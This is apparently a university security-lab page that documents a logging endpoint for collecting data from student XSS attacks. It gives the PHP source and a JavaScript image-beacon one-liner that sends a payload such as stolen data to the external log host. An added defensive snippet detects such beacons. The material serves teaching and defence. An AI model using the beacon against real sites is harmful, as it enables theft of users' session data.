You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2026/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
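How the image beacon described above looks from the defending side, as an added example that is not part of the original page or the course's code: it scores outbound request URLs (for instance from a proxy log) for the combination of a cross-origin destination and a secret-shaped query value. The regular expressions, the `app.example` and `stats.example.net` hosts, and the sample payload are assumptions constructed for illustration.

```javascript
// Added example: heuristics and thresholds are assumptions, not part of log.php.
const CACHE_BUSTER = /^0\.\d{6,}$/;       // shape of a Math.random() value
const COOKIE_LIKE = /[\w-]+=[^;&\s]{8,}/; // name=value carried inside one parameter
const LONG_TOKEN = /[0-9a-f]{32,}|[A-Za-z0-9+\/_-]{40,}/; // long hex or base64-like run

// Score one outbound request URL seen while a page from pageOrigin was open.
function scoreBeacon(requestUrl, pageOrigin) {
  const url = new URL(requestUrl);
  const reasons = [];
  if (url.origin !== pageOrigin) reasons.push('cross-origin');
  // searchParams yields percent-decoded values, so encoded payloads are covered.
  for (const [name, value] of url.searchParams) {
    if (CACHE_BUSTER.test(value)) reasons.push(`cache-buster:${name}`);
    if (COOKIE_LIKE.test(value) || LONG_TOKEN.test(value)) {
      reasons.push(`secret-like:${name}`);
    }
  }
  // Cross-origin images and cache busters are common on their own (analytics
  // pixels); flag only when a secret-shaped value also leaves the origin.
  const suspicious = reasons.includes('cross-origin') &&
    reasons.some((r) => r.startsWith('secret-like:'));
  return { host: url.host, suspicious, reasons };
}

function triage(requests, pageOrigin) {
  return requests.map((u) => scoreBeacon(u, pageOrigin)).filter((r) => r.suspicious);
}

// Constructed sample requests (not real traffic).
const PAGE_ORIGIN = 'https://app.example';
const SAMPLE_REQUESTS = [
  // Beacon in the shape shown above, with a constructed session-style payload.
  'https://css.csail.mit.edu/6.566/2026/labs/log.php?id=my-username' +
    '&payload=session%3Dalice%230123456789abcdef0123456789abcdef' +
    '&random=0.7364519283746152',
  // Ordinary analytics pixel: cross-origin with a cache buster, no secret.
  'https://stats.example.net/pixel.gif?page=%2Fhome&r=0.48213377',
  // Same-origin static asset.
  'https://app.example/static/logo.png?v=3',
];

for (const hit of triage(SAMPLE_REQUESTS, PAGE_ORIGIN)) {
  console.log(hit.host, hit.reasons.join(', '));
}
```

Detection like this complements, rather than replaces, marking session cookies `HttpOnly` and restricting `img-src` in a Content-Security-Policy.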
Below are the most recent logged entries, so that you can check if your attack worked:
In case you are curious, here is the source code of this page.
<?php

header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2026-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }

    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2026/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";

?><!DOCTYPE html>
<html>
<head>
  <link rel="stylesheet" type="text/css" href="labs.css" />
  <title>Lab 4 Logging Script</title>
</head>
<body>
<h1>Lab 4 Logging Script</h1>

<p>
  You can use this server side script to extract data from client-side
  JavaScript. For example, clicking this client-side hyperlink will cause
  the server to log the payload:
</p>

<pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>

<p>
  The random argument is ignored, but ensures that the browser bypasses its
  cache when downloading the image. We suggest that you use the random
  argument in your scripts as well. The ID argument will help you distinguish
  your log entries from those sent by other students; we suggest picking your
  MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links;
  if this bothers you, try
  <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
</p>

<h2>Test form</h2>

<p>
  If you just want to try out the script, you can use this form. (For your
  actual attacks in lab 4, you'll probably want to use the JavaScript image
  technique shown above.)
</p>

<form method="GET" action="">
  <label for="id">ID:</label><br />
  <input name="id" placeholder="your-mit-username" size="40" />
  <i>(some identifier to locate your payload in the log)</i>
  <br />
  <br />
  <label for="payload">Payload:</label><br />
  <input name="payload" placeholder="some-string" size="40" />
  <i>(the information you stole)</i>
  <br />
  <input type="submit" value="Log" name="log_submit" />
</form>

<h2>Logged entries</h2>

<p>
  Below are the most recent logged entries, so that you can check if your
  attack worked:
</p>

<pre class="tty"><?php
  $lines = file_get_contents("/tmp/6.566-2026-logger.txt");
  echo htmlspecialchars($lines);
?></pre>

<h2>Source code</h2>

<p>In case you are curious, here is the source code of this page.</p>

<pre><?php highlight_file(__FILE__); ?></pre>

</body>
</html>